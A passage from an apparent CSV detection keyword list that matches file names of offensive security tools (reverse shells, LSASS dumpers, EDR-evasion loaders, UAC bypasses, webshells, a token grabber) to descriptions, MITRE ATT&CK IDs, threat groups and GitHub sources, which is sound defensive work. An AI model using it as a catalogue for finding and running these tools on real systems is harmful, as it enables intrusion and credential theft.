fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18770" "*\SharpZeroLogon.sln*",".{0,1000}\\SharpZeroLogon\.sln.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","18771" "*\Shell3er.ps1*",".{0,1000}\\Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","18772" "*\Shell3er-main*",".{0,1000}\\Shell3er\-main.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","18773" "*\Shellcode Execution\CertEnumSystemStore\*",".{0,1000}\\Shellcode\sExecution\\CertEnumSystemStore\\.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - 
T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18774" "*\Shellcode Execution\Enum*",".{0,1000}\\Shellcode\sExecution\\Enum.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18775" "*\Shellcode Process Injector.csproj*",".{0,1000}\\Shellcode\sProcess\sInjector\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18776" "*\shellcode.hpp*",".{0,1000}\\shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","18777" "*\shellcode_callback.exe*",".{0,1000}\\shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18778" "*\shellcode_createproc.xml*",".{0,1000}\\shellcode_createproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","18779" "*\shellcode_generate.py*",".{0,1000}\\shellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","18780" "*\shellcode_loader.dll*",".{0,1000}\\shellcode_loader\.dll.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","18781" "*\shellcode_samples\*",".{0,1000}\\shellcode_samples\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","18782" 
"*\shellcode2vba.py*",".{0,1000}\\shellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18783" "*\shellcode2vbafunc.py*",".{0,1000}\\shellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18784" "*\shellcode-xor.py*",".{0,1000}\\shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","18785" "*\ShellGen.ps1*",".{0,1000}\\ShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","18786" "*\ShellGen-main.zip*",".{0,1000}\\ShellGen\-main\.zip.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","18787" "*\shelljack.c*",".{0,1000}\\shelljack\.c.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & 
Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","18791" "*\ShellPwnsh-main*",".{0,1000}\\ShellPwnsh\-main.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","18792" "*\shellsilo.py*",".{0,1000}\\shellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","0","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","18793" "*\ShellSync-main.zip*",".{0,1000}\\ShellSync\-main\.zip.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","18794" "*\sherlock.exe*",".{0,1000}\\sherlock\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","18795" "*\Shhhavoc.py*",".{0,1000}\\Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","18796" "*\Shhmon.*",".{0,1000}\\Shhmon\..{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","0","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","18797" "*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18798" "*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18799" "*\Shhmon.exe*",".{0,1000}\\Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18800" "*\ShimDB\sdb-explorer*",".{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","N/A","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","18801" "*\ShimInjector.cpp*",".{0,1000}\\ShimInjector\.cpp.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18802" "*\ShimInjector.cpp*",".{0,1000}\\ShimInjector\.cpp.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 
- TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18803" "*\ShimInjector.exe*",".{0,1000}\\ShimInjector\.exe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","18804" "*\ShInject.exe*",".{0,1000}\\ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18805" "*\Shock.exe knowndlls*",".{0,1000}\\Shock\.exe\sknowndlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","18806" "*\Shoggoth.exe*",".{0,1000}\\Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - 
TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18807" "*\Shoggoth.pptx*",".{0,1000}\\Shoggoth\.pptx.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18808" "*\Shoggoth.sln*",".{0,1000}\\Shoggoth\.sln.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18809" "*\ShoggothEngine.cpp*",".{0,1000}\\ShoggothEngine\.cpp.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","18810" "*\Shu1337.php*",".{0,1000}\\Shu1337\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18812" "*\shutter-main.zip*",".{0,1000}\\shutter\-main\.zip.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. 
Management can include blocking or permitting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","18813" "*\Shwmae.exe*",".{0,1000}\\Shwmae\.exe.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","18814" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker 
- DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","18816" "*\SigFlip.exe*",".{0,1000}\\SigFlip\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","18817" "*\SigmaPotato.csproj*",".{0,1000}\\SigmaPotato\.csproj.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","18818" "*\signed-executables\svchost.exe*",".{0,1000}\\signed\-executables\\svchost\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource 
Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","18819" "*\SignToolEx.cpp*",".{0,1000}\\SignToolEx\.cpp.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18820" "*\SignToolEx.sln*",".{0,1000}\\SignToolEx\.sln.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18821" "*\SignToolExDll*",".{0,1000}\\SignToolExDll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","18822" "*\sigthief.exe*",".{0,1000}\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","18823" "*\sigthief.py*",".{0,1000}\\sigthief\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","18824" "*\Silent.7z*",".{0,1000}\\Silent\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","N/A","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","18825" "*\SilentClean.exe*",".{0,1000}\\SilentClean\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","18826" "*\SilentCryptoMiner\*",".{0,1000}\\SilentCryptoMiner\\.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","N/A","9","","N/A","","","","18827" "*\SilentProcessExit.sln*",".{0,1000}\\SilentProcessExit\.sln.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","18828" "*\silic webshell.jsp*",".{0,1000}\\silic\swebshell\.jsp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18829" 
"*\SillyRAT\*.py",".{0,1000}\\SillyRAT\\.{0,1000}\.py","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","18830" "*\SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php*",".{0,1000}\\SimAttacker\s\-\sVrsion\s1\.0\.0\s\-\spriv8\s4\sMy\sfriend\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","18831" "*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","0","N/A","N/A","10","","N/A","","","","18832" "*\simple-backdoor.php*",".{0,1000}\\simple\-backdoor\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 